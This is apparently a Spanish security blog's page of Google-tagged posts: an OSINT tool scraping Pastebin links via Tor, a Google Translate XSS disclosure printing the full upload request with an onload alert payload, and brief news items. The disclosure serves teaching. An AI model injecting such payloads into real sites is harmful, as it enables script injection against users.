Mostrando entradas con la etiqueta Google. Mostrar todas las entradas
Mostrando entradas con la etiqueta Google. Mostrar todas las entradas

OSINTretasNoHayPastebines

Buenas amigos de la seguridad y de la informática en general. Soy Fare9, y hoy traigo una herramienta que empecé hace un poquito de tiempo, como trabajo para una asignatura de seguridad en sistemas distribuidos, en concreto un trabajo de OSINT.

Pueden encontrar el código en el siguiente github: https://github.com/Fare9/OSINTretasNoHayPastebines

Pensaba yo, así para mis adentros, qué podría hacer como trabajo de OSINT, así para conseguir una buena nota, lo típico era coger shodan, o buscar cosas o gente en google, maltego... Y pensé, bueno ya que puedes buscar a gente en google y entregarlo pues "De 0 a Stalker", pero no, era demasiado creepy y no tenía gracia, ya que no estaba realizando ningún programa. Y a un compañero se le ocurrió "¿y si haces una herramienta que haga búsquedas de pastebin en fuentes públicas?". Y dije, normalmente lo complicado de pastebin, es obtener una buena URL con información, por tanto, podemos buscar URLs en fuentes públicas.

Pensé en una aplicación que tuviera consola, ya que así todo parece más de hackiers y esas cosas, además así que se muestren cosas chulas y logos... En un futuro añadiré el poder usarlo por medio de argumentos.
Además dije, esto se merece algún título absurdo, así que ahí fue "OSINTretasNoHayPastebines" (el primer borrador la parte de "Tre", no llevaba 'r', pero era un trabajo de clase).

Está implementado por medio de módulos, los cuales heredan de una clase base, estos acceden a las fuentes de información y antes de añadir una URL, consultan a ver si devuelve respuesta desde pastebin. Como conseguí que pastebin me baneara, pues añadí el uso de la red tor, así las peticiones se harían a través de otras IPs, no es 100% fiable, pero ayuda bastante.

Actualmente, tengo implementado 4 módulos:

  • Búsquedas en pastebin: busco en los últimos subidos, y en los más visitados, además si alguno de estos es un pastebin de un usuario, busco también dentro de este usuario.
  • Búsquedas en twitter: busco ciertas cadenas en tweets, los cuales contengan URLs de pastebin, normalmente en twitter, suelen salir los enlaces a noticias más novedosos.
  • Búsquedas en google: una gran base de datos mundial de información, como no, mejor si sabes buscar en esta base de datos. Uso un par de google dorks sencillos para permitir una búsqueda más "inteligente" en google de enlaces a pastebin con contenido interesante.
  • Búsquedas en bing: más o menos como Google, tarda más, pero obtenemos una gran cantidad de información.
Para verlo todo más claro, vamos a poner imagenes y dibujitos de esos que me gustan tanto a mi:
A continuación mostraré un poco su uso:

Aqui un Logo muy chulo, que va apareciendo linea a linea, para dar esa impresión de los videojuegos de toque clásico, este logo fue una genialidad de: https://github.com/syntax-samurai/ .
Pero lo que nos viene a interesar en este post, es la siguiente consola:
Tenemos una consola básica de comandos, la cual puede obtenerse más información con el comando "help":

Si tecleamos cada uno de estos comandos sin añadir nada más podremos obtener más ayuda, pero bueno son un poco "auto-explicativos" (creo que es término existe). Tenemos diferentes variables que podemos establecer, así como distintos módulos o crawlers, antes de cargar un crawler, podemos modificar las variables, y así modificar algunos comportamientos de este.
Vamos a ver un poco que variables nos podemos encontrar, para ello podemos escribir "set" y nos devolverá todas las variables disponibles:
Vemos algunas cosillas interesantes, entre estas, pues por ejemplo time_crawl, es el tiempo que durarán algunos de los plugins, por ejemplo el de twitter, se buscarán URLs de pastebin en twitter durante un tiempo igual al establecido.
use_tor nos valdrá para realizar las comprobaciones de las URLs encontradas, a través de TOR, así como las búsquedas a través de TOR, así evitamos que pastebin nos banée. Verbosity una variable ya bastante conocida, para mostrar mayor o menor información.

Vamos por ejemplo a establecer verbosity a 3, time_crawl = 15 segundos y cargar y ejecutar el crawler de twitter. Este tiempo, normalmente tomaremos el doble, ya que en el crawler se hacen esperas activas de 2 segundos, por tanto los segundos que entran por los que salen:
Aquí la configuración básica para el crawler de twitter, este crawler tira de selenium y beautifulSoup, por tanto en el readme, viene lo necesario a instalar para el crawler.

Bien, pues lo ejecutamos a ver que pasa:
Empezamos con el logging en twitter.


Empiezan entonces las búsquedas, según algunos valores fijados en el código (se pueden modificar perfectamente).

Se checkean las URLs encontradas para ver si aún siguen existiendo en pastebin.

Al finalizar el módulo, podemos hacer "show urls" para obtener las urls encontradas:
Estas URLs pueden ser guardadas y luego cargadas de nuevo, gracias a una última función que implementé que usa numpy para guardar la lista.

Estableceremos entonces unas cadenas de búsqueda:


Y finalmente para la búsqueda y que pastebin no banée a nadie, establecemos use_tor a true, y empezamos la búsqueda con search...
Como esto tarda un rato, escribiré una lista de chistes malos de Arguiñano, para aumentar el odio irracional ante este hombre mayor:

Cual es el colmo de un astronauta? Que se quede sin espacio

- Hola quería unas gafas para leer. 
- Si ayer le vendí unas. 
- Es que ya me las he leído. 


¿Dónde estudian los niños belgas? En los coles de Bruselas

Pueden seguir viendo chistes así en esta cuenta: https://twitter.com/chistesargui?lang=es 

 Una vez acabada la ejecución podemos mirar con show reconocimientos, lo que ha salido de la búsqueda:

Como vemos, hemos obtenido muchas URLs de pastebin (es posible encontrar muchas más), y además hemos obtenido resultados al buscar cadenas en estos enlaces.
Esta herramienta es una herramienta que me llevó poco hacerla, y seguramente contenga muchos errores, para cualquier cosa pueden contactarme por twitter @Fare9, o por el correo electrónico que aparece en el código.

Espero guste, y que puedan hacer uso de estas pequeñas herramientas.

Gracias y hasta la próxima.

El NO Cross-Site Scripting de Google



Hola a tod@s



El pasado día utilizando el traductor de Google me fije en una funcionalidad adicional que tiene el traductor, y es que nos permite la subida de ficheros para su traducción.


Inmediatamente me puse a analizar el servicio, cuál fue mi sorpresa cuando descubrí un XSS, Google no lo consideraba un riesgo, pues no tiene impacto porque se encuentra dentro de un sandbox, sea como fuere lo he querido traer aquí por su contenido didáctico y enseñar para el que no lo conozca.


En  primer lugar visitamos la dirección https://translate.google.es/?hl=es y hacer click en traducir un documento.


Imagen 1: https://translate.google.es/?hl=es




Subimos nuestra prueba de concepto y subimos.


 
Imagen 2:  Upload del fichero




Imagen 3: Traducir el documento



Por último podemos visualizar el XSS reflejado.

Imagen 4: XSS en el traductor de Google




A continuación la petición de Burp:

POST /translate_f HTTP/1.1
Host: translate.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://translate.google.es/?hl=es
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147452561017500
Content-Length: 1095

-----------------------------147452561017500
Content-Disposition: form-data; name="sl"

en
-----------------------------147452561017500
Content-Disposition: form-data; name="tl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="js"

y
-----------------------------147452561017500
Content-Disposition: form-data; name="prev"

_t
-----------------------------147452561017500
Content-Disposition: form-data; name="hl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="ie"

UTF-8
-----------------------------147452561017500
Content-Disposition: form-data; name="text"


-----------------------------147452561017500
Content-Disposition: form-data; name="file"; filename="poc.html"
Content-Type: text/html

<img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg" onload="alert('XSS en Google AUDIT')"</img>
-----------------------------147452561017500
Content-Disposition: form-data; name="edit-text"


-----------------------------147452561017500--

 


Tras notificarlo a Google me informaron que no se considera un riesgo, pues está dentro de la sandbox, por lo que no afecta al bugbounty.

¿Eres un robot? Introducción a No CAPTCHA

Los típicos CAPTCHA que estamos habituados a ver en muchos sitios web tienen sus horas contadas, o eso es lo que nos cuenta el equipo de seguridad de Google.

Este sistema lleva años utilizándose para intentar evitar los ataques recibidos por parte de peticiones automatizadas y disminuir, entre otras cosas, el SPAM.

No obstante este método provoca un inconveniente al resto de los mortales que nos vemos obligados a adivinar y rellenar casillas con número y letras, por lo que Google ha estado trabajando en un nuevo sistema que te permite demostrar que "no eres un robot" con un simple Click. 


Se supone que el No CAPTCHA se irá implementando poco a poco en todas las páginas web que hagan uso de la API Re-Captcha y de esta forma los administradores de las mismas pueden hacer la vida un poco más sencilla a sus visitantes.

En el siguiente vídeo de Google Webmasters se explica el funcionamiento:


Ahora solo faltará comprobar su eficacia real y ver los resultados de las múltiples pruebas a las que será sometido este sistema por parte de toda la comunidad.


Firing Range. Herramienta de Google para probar tu escáner web.

Unknown 2 Comments
En su lucha por una web más segura, la gente de Google ha lanzado esta semana una nueva herramienta llamada Firing Range enfocada a probar la eficacia de los análisis automáticos sobre aplicaciones web.

Ésta se suma al proyecto anterior, Nogotofail, implementado para realizar comprobaciones de seguridad, búsqueda de vulnerabilidades y fallos de configuración en el servicio TLS/SSL de cualquier dispositivo.

Respecto a Firing Range, se trata de una aplicación en Java repleta de todo tipo de vulnerabilidades XSS (Cross-site scripting) y, en menor medida, de reverse clickjacking, Flash injection, y cross-origin resource sharing, entre otros.

Al tratarse de un proyecto open source, el código está habilitado en la siguiente cuenta de GitHub, aunque Google ha subido la aplicación a su servicio de Google App Engine.

Tenéis más información en:

Chrome Canary



Hola a tod@s


Si sois usuarios de Google Chrome, estáis de enhorabuena. Google anunció que presentará una nueva versión de su navegador de Internet, Chrome Canary. En este momento se encuentra en versión de pruebas hasta que esté todo correcto antes de su lanzamiento. Una de las mejoras es su capacidad para detectar malware, el cual bloquea de forma automática antes de que se descargue en tu ordeandor, por lo que éste nunca encontrará camino a tu disco duro. Todo lo que ves es una notificación como la siguiente:



Con este gesto Google intentará mejorar la seguridad en su navegador web y prevenir a sus usuarios de ser víctimas del malware.
Como dice Google en su blog. “Proteger es una prioridad, es por eso que estamos trabajando para evitar que los usuarios se vean afectados por malware”
 

No seáis malos.